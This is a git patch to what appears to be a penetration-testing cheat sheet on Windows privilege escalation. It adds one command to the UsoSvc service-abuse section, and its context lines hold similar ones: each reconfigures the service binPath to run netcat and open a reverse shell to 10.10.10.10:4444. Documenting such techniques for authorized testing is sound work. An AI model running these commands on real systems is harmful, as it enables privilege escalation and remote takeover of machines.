From a3cc577ebda5414c7903cf69ba819ac52d317003 Mon Sep 17 00:00:00 2001 From: guenicoe <62290334+guenicoe@users.noreply.github.com> Date: Tue, 24 Mar 2020 20:15:59 +0000 Subject: [PATCH] added cmd on the USOSVC vuln Added `cmd \c C:\Users\nc.exe` as not typing `cmd \c` did not work for me. Might need even more explanation --- Methodology and Resources/Windows - Privilege Escalation.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 6a2af2b..d4b05d6 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -521,6 +521,7 @@ Prerequisite: Service account PS C:\Windows\system32> sc.exe stop UsoSvc PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe qc usosvc [SC] QueryServiceConfig SUCCESS